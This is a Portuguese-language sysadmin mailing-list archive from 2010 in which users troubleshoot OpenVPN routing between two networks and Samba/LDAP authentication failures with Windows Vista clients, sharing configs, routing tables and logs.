From marcio.merlone at a1.ind.br Wed Sep 1 15:52:26 2010 From: marcio.merlone at a1.ind.br (Marcio Merlone) Date: Wed, 01 Sep 2010 15:52:26 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?Roteamento_entre_2_redes_atr=E1s_de_Ope?= =?iso-8859-1?q?nVPN?= Message-ID: <4C7EA0EA.9020704@a1.ind.br> Colegas, Desculpem o tamanho da quest?o e sejam caridosos com este bizonho que vos fala e confessa a incapacidade de rotear duas redes por uma VPN com o OpenVPN 2.1.0-1ubuntu1.1. Preciso de ajuda para fazer as duas redes se enxergar pela VPN, ou seja, o cliente e servidor ovpn v?o ter que rotear de uma rede pra outra (n?o s? o cliente e servidor, mas as redes todas). Todos os envolvidos est?o em redes l?gicas e geogr?ficas distintas e (ainda) sem iptables. Resumindo: Servidor: 192.168.0.100/24 (Default GW = 192.168.0.254 = gw.dominio) Cliente: 10.1.0.1/16 (a VPN fecha via internet) Rede para a VPN: 10.255.0.0/24 Server.conf: port 1194 proto udp dev tun ca ca.crt cert server.crt key server.key dh dh1024.pem server 10.255.0.0 255.255.255.0 ifconfig-pool-persist ipp.txt client-config-dir ccd route 10.1.0.0 255.255.0.0 route 10.255.0.0 255.255.0.0 push "route 192.168.0.0 255.255.255.0" push "dhcp-option WINS 192.168.0.1" client-to-client keepalive 10 120 tls-auth ta.key 0 # This file is secret comp-lzo user nobody group nogroup persist-key persist-tun status openvpn-status.log verb 3 mute 20 script-security 1 execve Configura??o para cliente em 'ccd\cliente': iroute 10.1.0.0 255.255.255.0 ifconfig-push 10.255.0.2 10.255.0.1 No default gateway da rede 192.168.0.0 (192.168.0.254) foi configurada a rota para a rede 10.1.0.0 via o 192.168.0.100. Desta forma, quando subo a VPN, uma m?quina qualquer da rede 192.168.0.0/24 consegue pingar o cliente 10.1.0.1, mas n?o uma m?quina na rede, por exemplo o 10.1.0.3 (que sei que existe e ? ip fixo): root at desktop:~# traceroute 10.1.0.1 traceroute to 10.1.0.1 (10.1.0.1), 30 hops max, 60 byte packets 1 gw.dominio (192.168.0.254) 0.409 ms 0.453 ms 0.548 ms 2 ovpn.dominio (192.168.0.100) 0.731 ms 0.758 ms 0.774 ms 3 10.1.0.1 (10.1.0.1) 21.512 ms 22.055 ms 22.730 ms root at desktop:~# root at desktop:~# traceroute 10.1.0.3 traceroute to 10.1.0.3 (10.1.0.3), 30 hops max, 60 byte packets 1 gw.dominio (192.168.0.254) 0.422 ms 0.495 ms 0.589 ms 2 ovpn.dominio (192.168.0.100) 0.720 ms 0.759 ms 0.811 ms 3 10.255.0.2 (10.255.0.2) 21.766 ms 22.897 ms 23.498 ms 4 * * * 5 * * * 6 *^C root at desktop:~# O que me estranha ? que o terceiro salto ? diferente. Quando estabelecida a VPN, as tabelas de roteamento ficam: Servidor: root at ovpn:/etc/openvpn# route -n Tabela de Roteamento IP do Kernel Destino Roteador M?scaraGen. Op??es M?trica Ref Uso Iface 10.255.0.2 0.0.0.0 255.255.255.255 UH 0 0 0 tun0 10.255.0.0 10.255.0.2 255.255.255.0 UG 0 0 0 tun0 192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth3 10.1.0.0 10.255.0.2 255.255.0.0 UG 0 0 0 tun0 10.255.0.0 10.255.0.2 255.255.0.0 UG 0 0 0 tun0 0.0.0.0 192.168.0.254 0.0.0.0 UG 0 0 0 eth3 root at ovpn:/etc/openvpn# Cliente: root at cliente:/etc/network# route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 10.255.0.1 0.0.0.0 255.255.255.255 UH 0 0 0 tun0 187.17.143.160 0.0.0.0 255.255.255.252 U 0 0 0 eth1 10.255.0.0 10.255.0.1 255.255.255.0 UG 0 0 0 tun0 192.168.0.0 10.255.0.1 255.255.255.0 UG 0 0 0 tun0 10.1.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0 0.0.0.0 187.17.143.162 0.0.0.0 UG 100 0 0 eth1 root at cliente:/etc/network# A pergunta ?: ond? quieu t? comendo bola? Grato por qualquer dica, rtfm, link, etc. Depois que eu resolver isso, ainda vou ter que adicionar mais outra rede cliente e fazer as duas se enxergarem pela VPN... -- Marcio Merlone From webgeo at gmail.com Wed Sep 1 15:57:11 2010 From: webgeo at gmail.com (Giovane Heleno) Date: Wed, 1 Sep 2010 15:57:11 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?Roteamento_entre_2_redes_atr=E1s_de_Ope?= =?iso-8859-1?q?nVPN?= In-Reply-To: <4C7EA0EA.9020704@a1.ind.br> References: <4C7EA0EA.9020704@a1.ind.br> Message-ID: N?o conhe?o o OpenVPN, mas seu tunel ? L3? Roteamento ? feito em cima de L2 (mesmo que o protocolo de roteamento trabalhe em L3). Giovane Heleno www.giovane.pro.br Em 1 de setembro de 2010 15:52, Marcio Merlone escreveu: > ?Colegas, > > Desculpem o tamanho da quest?o e sejam caridosos com este bizonho que vos > fala e confessa a incapacidade de rotear duas redes por uma VPN com o > OpenVPN 2.1.0-1ubuntu1.1. Preciso de ajuda para fazer as duas redes se > enxergar pela VPN, ou seja, o cliente e servidor ovpn v?o ter que rotear de > uma rede pra outra (n?o s? o cliente e servidor, mas as redes todas). Todos > os envolvidos est?o em redes l?gicas e geogr?ficas distintas e (ainda) sem > iptables. Resumindo: > > Servidor: 192.168.0.100/24 (Default GW = 192.168.0.254 = gw.dominio) > Cliente: 10.1.0.1/16 (a VPN fecha via internet) > Rede para a VPN: 10.255.0.0/24 > > Server.conf: > port 1194 > proto udp > dev tun > ca ca.crt > cert server.crt > key server.key > dh dh1024.pem > server 10.255.0.0 255.255.255.0 > ifconfig-pool-persist ipp.txt > client-config-dir ccd > route 10.1.0.0 255.255.0.0 > route 10.255.0.0 255.255.0.0 > push "route 192.168.0.0 255.255.255.0" > push "dhcp-option WINS 192.168.0.1" > client-to-client > keepalive 10 120 > tls-auth ta.key 0 # This file is secret > comp-lzo > user nobody > group nogroup > persist-key > persist-tun > status openvpn-status.log > verb 3 > mute 20 > script-security 1 execve > > Configura??o para cliente em 'ccd\cliente': > iroute 10.1.0.0 255.255.255.0 > ifconfig-push 10.255.0.2 10.255.0.1 > > No default gateway da rede 192.168.0.0 (192.168.0.254) foi configurada a > rota para a rede 10.1.0.0 via o 192.168.0.100. > > Desta forma, quando subo a VPN, uma m?quina qualquer da rede 192.168.0.0/24 > consegue pingar o cliente 10.1.0.1, mas n?o uma m?quina na rede, por exemplo > o 10.1.0.3 (que sei que existe e ? ip fixo): > > root at desktop:~# traceroute 10.1.0.1 > traceroute to 10.1.0.1 (10.1.0.1), 30 hops max, 60 byte packets > ?1 ?gw.dominio (192.168.0.254) ?0.409 ms ?0.453 ms ?0.548 ms > ?2 ?ovpn.dominio (192.168.0.100) ?0.731 ms ?0.758 ms ?0.774 ms > ?3 ?10.1.0.1 (10.1.0.1) ?21.512 ms ?22.055 ms ?22.730 ms > root at desktop:~# > > root at desktop:~# traceroute 10.1.0.3 > traceroute to 10.1.0.3 (10.1.0.3), 30 hops max, 60 byte packets > ?1 ?gw.dominio (192.168.0.254) ?0.422 ms ?0.495 ms ?0.589 ms > ?2 ?ovpn.dominio (192.168.0.100) ?0.720 ms ?0.759 ms ?0.811 ms > ?3 ?10.255.0.2 (10.255.0.2) ?21.766 ms ?22.897 ms ?23.498 ms > ?4 ?* * * > ?5 ?* * * > ?6 ?*^C > root at desktop:~# > > O que me estranha ? que o terceiro salto ? diferente. Quando estabelecida a > VPN, as tabelas de roteamento ficam: > > Servidor: > root at ovpn:/etc/openvpn# route -n > Tabela de Roteamento IP do Kernel > Destino ? ? ? ? Roteador ? ? ? ?M?scaraGen. ? ?Op??es M?trica Ref ? Uso > Iface > 10.255.0.2 ? ? ?0.0.0.0 ? ? ? ? 255.255.255.255 UH ? ?0 ? ? ?0 ? ? ? ?0 tun0 > 10.255.0.0 ? ? ?10.255.0.2 ? ? ?255.255.255.0 ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 > 192.168.0.0 ? ? 0.0.0.0 ? ? ? ? 255.255.255.0 ? U ? ? 0 ? ? ?0 ? ? ? ?0 eth3 > 10.1.0.0 ? ? ? ?10.255.0.2 ? ? ?255.255.0.0 ? ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 > 10.255.0.0 ? ? ?10.255.0.2 ? ? ?255.255.0.0 ? ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 > 0.0.0.0 ? ? ? ? 192.168.0.254 ? 0.0.0.0 ? ? ? ? UG ? ?0 ? ? ?0 ? ? ? ?0 eth3 > root at ovpn:/etc/openvpn# > > Cliente: > root at cliente:/etc/network# route -n > Kernel IP routing table > Destination ? ? Gateway ? ? ? ? Genmask ? ? ? ? Flags Metric Ref ? ?Use > Iface > 10.255.0.1 ? ? ?0.0.0.0 ? ? ? ? 255.255.255.255 UH ? ?0 ? ? ?0 ? ? ? ?0 tun0 > 187.17.143.160 ?0.0.0.0 ? ? ? ? 255.255.255.252 U ? ? 0 ? ? ?0 ? ? ? ?0 eth1 > 10.255.0.0 ? ? ?10.255.0.1 ? ? ?255.255.255.0 ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 > 192.168.0.0 ? ? 10.255.0.1 ? ? ?255.255.255.0 ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 > 10.1.0.0 ? ? ? ?0.0.0.0 ? ? ? ? 255.255.0.0 ? ? U ? ? 0 ? ? ?0 ? ? ? ?0 eth0 > 0.0.0.0 ? ? ? ? 187.17.143.162 ?0.0.0.0 ? ? ? ? UG ? ?100 ? ?0 ? ? ? ?0 eth1 > root at cliente:/etc/network# > > A pergunta ?: ond? quieu t? comendo bola? > > Grato por qualquer dica, rtfm, link, etc. Depois que eu resolver isso, ainda > vou ter que adicionar mais outra rede cliente e fazer as duas se enxergarem > pela VPN... > > -- > Marcio Merlone > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From webgeo at gmail.com Wed Sep 1 15:58:31 2010 From: webgeo at gmail.com (Giovane Heleno) Date: Wed, 1 Sep 2010 15:58:31 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?Roteamento_entre_2_redes_atr=E1s_de_Ope?= =?iso-8859-1?q?nVPN?= In-Reply-To: References: <4C7EA0EA.9020704@a1.ind.br> Message-ID: Ops... j? vi... falei bobeira... kkk Confundi na hora de responder. Foi mal. Giovane Heleno www.giovane.pro.br Em 1 de setembro de 2010 15:57, Giovane Heleno escreveu: > N?o conhe?o o OpenVPN, mas seu tunel ? L3? > Roteamento ? feito em cima de L2 (mesmo que o protocolo de roteamento > trabalhe em L3). > > > Giovane Heleno > www.giovane.pro.br > > > > > Em 1 de setembro de 2010 15:52, Marcio Merlone > escreveu: >> ?Colegas, >> >> Desculpem o tamanho da quest?o e sejam caridosos com este bizonho que vos >> fala e confessa a incapacidade de rotear duas redes por uma VPN com o >> OpenVPN 2.1.0-1ubuntu1.1. Preciso de ajuda para fazer as duas redes se >> enxergar pela VPN, ou seja, o cliente e servidor ovpn v?o ter que rotear de >> uma rede pra outra (n?o s? o cliente e servidor, mas as redes todas). Todos >> os envolvidos est?o em redes l?gicas e geogr?ficas distintas e (ainda) sem >> iptables. Resumindo: >> >> Servidor: 192.168.0.100/24 (Default GW = 192.168.0.254 = gw.dominio) >> Cliente: 10.1.0.1/16 (a VPN fecha via internet) >> Rede para a VPN: 10.255.0.0/24 >> >> Server.conf: >> port 1194 >> proto udp >> dev tun >> ca ca.crt >> cert server.crt >> key server.key >> dh dh1024.pem >> server 10.255.0.0 255.255.255.0 >> ifconfig-pool-persist ipp.txt >> client-config-dir ccd >> route 10.1.0.0 255.255.0.0 >> route 10.255.0.0 255.255.0.0 >> push "route 192.168.0.0 255.255.255.0" >> push "dhcp-option WINS 192.168.0.1" >> client-to-client >> keepalive 10 120 >> tls-auth ta.key 0 # This file is secret >> comp-lzo >> user nobody >> group nogroup >> persist-key >> persist-tun >> status openvpn-status.log >> verb 3 >> mute 20 >> script-security 1 execve >> >> Configura??o para cliente em 'ccd\cliente': >> iroute 10.1.0.0 255.255.255.0 >> ifconfig-push 10.255.0.2 10.255.0.1 >> >> No default gateway da rede 192.168.0.0 (192.168.0.254) foi configurada a >> rota para a rede 10.1.0.0 via o 192.168.0.100. >> >> Desta forma, quando subo a VPN, uma m?quina qualquer da rede 192.168.0.0/24 >> consegue pingar o cliente 10.1.0.1, mas n?o uma m?quina na rede, por exemplo >> o 10.1.0.3 (que sei que existe e ? ip fixo): >> >> root at desktop:~# traceroute 10.1.0.1 >> traceroute to 10.1.0.1 (10.1.0.1), 30 hops max, 60 byte packets >> ?1 ?gw.dominio (192.168.0.254) ?0.409 ms ?0.453 ms ?0.548 ms >> ?2 ?ovpn.dominio (192.168.0.100) ?0.731 ms ?0.758 ms ?0.774 ms >> ?3 ?10.1.0.1 (10.1.0.1) ?21.512 ms ?22.055 ms ?22.730 ms >> root at desktop:~# >> >> root at desktop:~# traceroute 10.1.0.3 >> traceroute to 10.1.0.3 (10.1.0.3), 30 hops max, 60 byte packets >> ?1 ?gw.dominio (192.168.0.254) ?0.422 ms ?0.495 ms ?0.589 ms >> ?2 ?ovpn.dominio (192.168.0.100) ?0.720 ms ?0.759 ms ?0.811 ms >> ?3 ?10.255.0.2 (10.255.0.2) ?21.766 ms ?22.897 ms ?23.498 ms >> ?4 ?* * * >> ?5 ?* * * >> ?6 ?*^C >> root at desktop:~# >> >> O que me estranha ? que o terceiro salto ? diferente. Quando estabelecida a >> VPN, as tabelas de roteamento ficam: >> >> Servidor: >> root at ovpn:/etc/openvpn# route -n >> Tabela de Roteamento IP do Kernel >> Destino ? ? ? ? Roteador ? ? ? ?M?scaraGen. ? ?Op??es M?trica Ref ? Uso >> Iface >> 10.255.0.2 ? ? ?0.0.0.0 ? ? ? ? 255.255.255.255 UH ? ?0 ? ? ?0 ? ? ? ?0 tun0 >> 10.255.0.0 ? ? ?10.255.0.2 ? ? ?255.255.255.0 ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 >> 192.168.0.0 ? ? 0.0.0.0 ? ? ? ? 255.255.255.0 ? U ? ? 0 ? ? ?0 ? ? ? ?0 eth3 >> 10.1.0.0 ? ? ? ?10.255.0.2 ? ? ?255.255.0.0 ? ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 >> 10.255.0.0 ? ? ?10.255.0.2 ? ? ?255.255.0.0 ? ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 >> 0.0.0.0 ? ? ? ? 192.168.0.254 ? 0.0.0.0 ? ? ? ? UG ? ?0 ? ? ?0 ? ? ? ?0 eth3 >> root at ovpn:/etc/openvpn# >> >> Cliente: >> root at cliente:/etc/network# route -n >> Kernel IP routing table >> Destination ? ? Gateway ? ? ? ? Genmask ? ? ? ? Flags Metric Ref ? ?Use >> Iface >> 10.255.0.1 ? ? ?0.0.0.0 ? ? ? ? 255.255.255.255 UH ? ?0 ? ? ?0 ? ? ? ?0 tun0 >> 187.17.143.160 ?0.0.0.0 ? ? ? ? 255.255.255.252 U ? ? 0 ? ? ?0 ? ? ? ?0 eth1 >> 10.255.0.0 ? ? ?10.255.0.1 ? ? ?255.255.255.0 ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 >> 192.168.0.0 ? ? 10.255.0.1 ? ? ?255.255.255.0 ? UG ? ?0 ? ? ?0 ? ? ? ?0 tun0 >> 10.1.0.0 ? ? ? ?0.0.0.0 ? ? ? ? 255.255.0.0 ? ? U ? ? 0 ? ? ?0 ? ? ? ?0 eth0 >> 0.0.0.0 ? ? ? ? 187.17.143.162 ?0.0.0.0 ? ? ? ? UG ? ?100 ? ?0 ? ? ? ?0 eth1 >> root at cliente:/etc/network# >> >> A pergunta ?: ond? quieu t? comendo bola? >> >> Grato por qualquer dica, rtfm, link, etc. Depois que eu resolver isso, ainda >> vou ter que adicionar mais outra rede cliente e fazer as duas se enxergarem >> pela VPN... >> >> -- >> Marcio Merlone >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > From neto-listas at sagem-orga.com.br Wed Sep 1 16:36:36 2010 From: neto-listas at sagem-orga.com.br (=?ISO-8859-1?Q?Jos=E9_Augusto_dos_Santos_Neto?=) Date: Wed, 01 Sep 2010 16:36:36 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?Roteamento_entre_2_redes_atr=E1s_de_Ope?= =?iso-8859-1?q?nVPN?= In-Reply-To: <4C7EA0EA.9020704@a1.ind.br> References: <4C7EA0EA.9020704@a1.ind.br> Message-ID: <4C7EAB44.9000506@sagem-orga.com.br> Marcio, 1 - Voc? ativou o forward entre as interfaces ? 2 - Usando o tcpdump na interface tun0 do servidor, voc? consegue ver os pacotes chegando do cliente, quando voc? testa o ping (cliente->lan) ? 3 - O cliente possui alguma rede 192.168.0.0/24 no local ? Eu j? tive um problema (comigo) pois a rede da minha casa conflitava com uma rede que eu tinha na empresa, por isso mudei meu endere?amento local. No meu caso, eu uso o iptables no servidor vpn pois tenho diferentes n?veis de acesso por usu?rio. Espero ter ajudado. Neto From rejaine at bhz.jamef.com.br Wed Sep 1 16:43:12 2010 From: rejaine at bhz.jamef.com.br (Rejaine Monteiro) Date: Wed, 01 Sep 2010 16:43:12 -0300 Subject: [MASOCH-L] Problemas com Samba e Vista In-Reply-To: <4C7873CE.4010007@bsd.com.br> References: <4C77FDCB.5060305@bhz.jamef.com.br> <4C7873CE.4010007@bsd.com.br> Message-ID: <4C7EACD0.90604@bhz.jamef.com.br> Bom, j? fiz v?rias altera??es no Regedit (como descrito em http://www.builderau.com.au/blogs/codemonkeybusiness/viewblogpost.htm?p=339270746) Tamb?m adicionei as entradas abaixo no /etc/samba/smb.conf , como sugerido em algum outro lugar: # For compatibility with Windows Vista client lanman auth = no client ntlmv2 auth = yes domain logons = yes guest account = nobody netbios name = meuservidor Mas nada.. Utilizo LDAP para autenticar usu?rios e tudo funciona bem. O usu?rio do Vista consegue loga na m?quina, acessa os compartilhamentos, abre, modifica, salva etc... Num dado momento, parece que depois de um tempo sem utilizar, as conex?es s?o fechadas. Quando ele tenta abrir novamente, parece que ele n?o consegue mais encontrar o usu?rio da sess?o no LDAP, portanto ocorre falha de autentica??o, ele tenta mapear como guest (nobody) e como "nobody " n?o tem acesso ao compartilhamento em quest?o, ocorrem os erros de acesso negado/chdir failed etc... Reparem na sequ?ncia que o log mostra exatamente isso (no caso a usu?ria ? "bruna" e o compartilhamento "qualidade") [2010/09/01 15:47:03, 2] lib/smbldap.c:smbldap_open_connection(788) smbldap_open_connection: connection opened [2010/09/01 15:47:03, 2] passdb/pdb_ldap.c:init_sam_from_ldap(541) init_sam_from_ldap: Entry found for user: bruna [2010/09/01 15:47:03, 2] auth/auth.c:check_ntlm_password(309) check_ntlm_password: authentication for user [bruna] -> [bruna] -> [bruna] succeeded [2010/09/01 15:47:03, 1] smbd/service.c:make_connection_snum(950) bhzquali4 (10.10.3.254) connect to service qualidade initially as user bruna (uid=16214, gid=1050) (pid 17506) [2010/09/01 15:47:03, 2] smbd/reply.c:reply_tcon_and_X(711) Serving qualidade as a Dfs root [2010/09/01 15:47:03, 2] smbd/open.c:open_file(352) bruna opened file Atalho para qualidade em 'Samba 3.0.23d-6-1083-SUSE-SL10.2 (bhznet)' (Q).lnk read=Yes write=No (numopen=1) [2010/09/01 15:47:03, 2] smbd/open.c:open_file(352) bruna opened file qualidade em 'Samba 3.0.9-2.3-SUSE (bhznet)' (Q).lnk read=Yes write=No (numopen=2) smbldap_open_connection: connection opened [2010/09/01 15:10:14, 2] smbd/close.c:close_normal_file(344) bruna closed file Reclama??es de Clientes/- Diversos -/Levantamento causa bhz.xlsx (numopen=5) init_sam_from_ldap: Entry found for user: bruna [2010/09/01 15:10:14, 2] smbd/close.c:close_normal_file(344) < corte> Aqui come?am os problemas... Depois que finaliza o compartilhamento, por timeout e depois ? requisitado o compartilhamento novamente, o sistema n?o consegue localizar a usu?ria para fazer re-autentica??o, (NT_STATUS_NO_SUCH_USER) , tenta mapear para "guest" (nobody) e nesse caso, como nobody n?o tem (e n?o pode ter) acesso a esse compartilhamento, come?am a dar os erros .... bhzquali4 (10.10.3.254) closed connection to service qualidade [2010/09/01 15:21:19, 2] lib/smbldap.c:smbldap_open_connection(788) smbldap_open_connection: connection opened [2010/09/01 15:21:19, 2] smbd/reply.c:reply_tcon_and_X(711) Serving IPC$ as a Dfs root [2010/09/01 15:23:30, 2] smbd/process.c:timeout_processing(1394) Closing idle connection [2010/09/01 15:25:20, 2] lib/smbldap.c:smbldap_open_connection(788) smbldap_open_connection: connection opened [2010/09/01 15:25:20, 2] smbd/reply.c:reply_tcon_and_X(711) Serving IPC$ as a Dfs root [2010/09/01 15:26:03, 2] smbd/sesssetup.c:setup_new_vc_session(799) setup_new_vc_session: New VC == 0, if NT4.x compatible we would close all old resources. [2010/09/01 15:26:03, 2] smbd/sesssetup.c:setup_new_vc_session(799) setup_new_vc_session: New VC == 0, if NT4.x compatible we would close all old resources. [2010/09/01 15:26:08, 2] auth/auth.c:check_ntlm_password(319) check_ntlm_password: Authentication for user [bruna] -> [bruna] FAILED with error NT_STATUS_NO_SUCH_USER [2010/09/01 15:26:08, 2] lib/smbldap.c:smbldap_open_connection(788) smbldap_open_connection: connection opened [2010/09/01 15:26:08, 2] smbd/reply.c:reply_tcon_and_X(711) Serving IPC$ as a Dfs root [2010/09/01 15:26:08, 1] smbd/service.c:make_connection_snum(950) bhzquali4 (10.10.3.254) connect to service qualidade initially as user nobody (uid=65534, gid=65533) (pid 4144) [2010/09/01 15:26:08, 2] smbd/reply.c:reply_tcon_and_X(711) Serving qualidade as a Dfs root [2010/09/01 15:26:08, 0] smbd/service.c:set_current_service(150) chdir (/samba/qualidade) failed [2010/09/01 15:26:08, 0] smbd/service.c:set_current_service(150) chdir (/samba/qualidade) failed Rejaine da Silveira Monteiro Suporte-TI Jamef Encomendas Urgentes Matriz - Contagem/MG Tel: (31) 2102-8854 www.jamef.com.br Em 27-08-2010 23:26, Paulo Henrique escreveu: > Em 27/08/2010 15:02, Rejaine Monteiro escreveu: >> Ol? pessoal, >> >> Estamos com alguns problemas depois que inserimos algumas m?quinas com >> Windows Vista no dom?nio do SAMBA >> >> Conseguimos incluir as m?quinas no dom?nio sem maiores problemas. Os >> mapeamos s?o criados pelo script de startup e s?o carregados os profiles >> dos usu?rios, etc... >> Por?m, volta e meia, os compartilhamentos simplesmente se perdem - >> passando a ocorrer mensagens de 'acesso negado' (NT_STATUS_DENIED) ao >> tentar abrir a unidade compartilhada >> Da? o sujeito faz um logoff e login novamente e tudo volta ao normal. >> Isso tem ocorrido com certa frequencia, mas somente nas m?quinas que >> est?o sendo substitu?das com o Vista. >> >> Um outro detalhe que notei ? que desde que passamos a inserir Vista na >> rede, o master browser do servidor SAMBA n?o consegue mais se eleger >> (mesmo com oslevel setado para 255). >> >> Ocorre o erro abaixo: >> >> send_election_dgram: Sending election packet for workgroup DOMINIO on >> subnet 10.10.1.106 >> [2010/08/27 14:26:58, 2] nmbd/nmbd_elections.c:run_elections(204) >> run_elections:>>> Won election for workgroup DOMINIO on subnet >> 10.10.1.106<<< >> [2010/08/27 14:26:58, 2] >> nmbd/nmbd_become_lmb.c:become_local_master_browser(537) >> become_local_master_browser: Starting to become a master browser for >> workgroup DOMINIO on subnet 10.10.1.106 >> [2010/08/27 14:27:02, 0] >> nmbd/nmbd_nameregister.c:register_name_response(130) >> register_name_response: server at IP 10.10.3.144 rejected our name >> registration of DOMINIO<1d> IP 10.10.1.106 with error code 6. >> [2010/08/27 14:27:02, 0] >> nmbd/nmbd_become_lmb.c:become_local_master_fail2(417) >> become_local_master_fail2: failed to register name DOMINIO<1d> on >> subnet 10.10.1.106. Failed to become a local master browser. >> [2010/08/27 14:27:02, 2] >> nmbd/nmbd_become_lmb.c:unbecome_local_master_browser(280) >> unbecome_local_master_browser: unbecoming local master for workgroup >> DOMINIO on subnet 10.10.1.106 >> >> >> No ambiente do servidor samba aqui est? um pouco desatualizado, e creio >> que seja por isso - Mas como n?o tenho como atualizar agora, gostaria >> de saber se algu?m por ventura tenha passado por problemas semelhante e >> SE existe alguma forma de contornar esse problema, at? que possamos >> atualizar o sistema. >> >> Desde ja agrade?o! >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > O Windows XP se comporta dessa maneira quando se trabalha com o Samba > apenas como DC e utiliza mapeamentos no sistema para uma pasta no > servidor, no qual ele ( windows xp ) a torne off-line, apos isso n?o ? > browsered os arquivos do DC e qualquer acesso a maquina da rede ou da > maquina a rede quando n?o retorna acesso negado, simplesmente n?o > disp?em nenhum erro. > Verifica se o mobsync.exe ( nome do sincronizador da microsoft no > Windows XP ) consta entre os processos em execu??o no windows vista. > Verifica tambem a configura??o quanto ao winbind lembro de ter lido na > documenta??o que o winbind no windows vista ouve autera??o no seu > comportamento. > > Sem mais, espero ter ajudado. > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From marcio.merlone at a1.ind.br Wed Sep 1 16:48:11 2010 From: marcio.merlone at a1.ind.br (Marcio Merlone) Date: Wed, 01 Sep 2010 16:48:11 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?Roteamento_entre_2_redes_atr=E1s_de_Ope?= =?iso-8859-1?q?nVPN?= In-Reply-To: <4C7EAB44.9000506@sagem-orga.com.br> References: <4C7EA0EA.9020704@a1.ind.br> <4C7EAB44.9000506@sagem-orga.com.br> Message-ID: <4C7EADFB.1030404@a1.ind.br> Em 01-09-2010 16:36, Jos? Augusto dos Santos Neto escreveu: > 1 - Voc? ativou o forward entre as interfaces ? Sim, o /proc/sys/net/ipv4/ip_forward ? 1, e o sysctl.conf t? de acordo. > 2 - Usando o tcpdump na interface tun0 do servidor, voc? consegue ver os > pacotes chegando do cliente, quando voc? testa o ping (cliente->lan) ? N?o sei, vou ver. > 3 - O cliente possui alguma rede 192.168.0.0/24 no local ? Eu j? tive um Nope. > Espero ter ajudado. :) -- Marcio Merlone From egbertomonteiro at gmail.com Wed Sep 1 16:49:19 2010 From: egbertomonteiro at gmail.com (Egberto Monteiro) Date: Wed, 01 Sep 2010 16:49:19 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?Roteamento_entre_2_redes_atr=E1s_de_Ope?= =?iso-8859-1?q?nVPN?= In-Reply-To: <4C7EA0EA.9020704@a1.ind.br> References: <4C7EA0EA.9020704@a1.ind.br> Message-ID: <4C7EAE3F.50800@gmail.com> Acho que vc s? comeu bola invertendo as redes. Da uma olhada neste exemplo em produ??o que tenho aqui: ############# VPN Server: route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 10.0.0.2 0.0.0.0 255.255.255.255 UH 0 0 0 tun0 xxx.xxx.xxx.128 0.0.0.0 255.255.255.128 U 0 0 0 eth0 192.168.9.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1 192.168.8.0 10.0.0.2 255.255.255.0 UG 0 0 0 tun0 0.0.0.0 xxx.xxx.xxx.129 0.0.0.0 UG 0 0 0 eth0 ifconfig eth0 Link encap:Ethernet HWaddr 00:16:76:6e:a0:b0 inet addr:xxx.xxx.xxx.131 Bcast:xxx.xxx.xxx.255 Mask:255.255.255.128 inet6 addr: fe80::216:76ff:fe6e:a0b0/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:833527056 errors:27 dropped:382 overruns:2 frame:0 TX packets:1152695383 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2674232040 (2.4 GiB) TX bytes:1800737225 (1.6 GiB) Interrupt:21 Base address:0x1200 eth1 Link encap:Ethernet HWaddr 00:05:1c:12:f3:94 inet addr:192.168.9.1 Bcast:192.168.9.255 Mask:255.255.255.0 inet6 addr: fe80::205:1cff:fe12:f394/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:955921695 errors:0 dropped:0 overruns:0 frame:0 TX packets:552397828 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1813129448 (1.6 GiB) TX bytes:1722794680 (1.6 GiB) Interrupt:17 Base address:0x1000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:33369 errors:0 dropped:0 overruns:0 frame:0 TX packets:33369 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:21555028 (20.5 MiB) TX bytes:21555028 (20.5 MiB) tun0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.0.0.1 P-t-P:10.0.0.2 Mask:255.255.255.255 UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1 RX packets:655125703 errors:0 dropped:0 overruns:0 frame:0 TX packets:1047791806 errors:0 dropped:137504 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:199429247 (190.1 MiB) TX bytes:1978168608 (1.8 GiB) ############## VPN Client: route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 10.0.0.1 0.0.0.0 255.255.255.255 UH 0 0 0 tun0 xxx.xxx.xxx.0 0.0.0.0 255.255.255.128 U 0 0 0 eth0 192.168.9.0 10.0.0.1 255.255.255.0 UG 0 0 0 tun0 192.168.8.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1 0.0.0.0 10.0.0.1 0.0.0.0 UG 0 0 0 tun0 ifconfig eth0 Link encap:Ethernet HWaddr 00:24:81:b3:d4:eb inet addr:xxx.xxx.xxx.2 Bcast:xxx.xxx.xxx.127 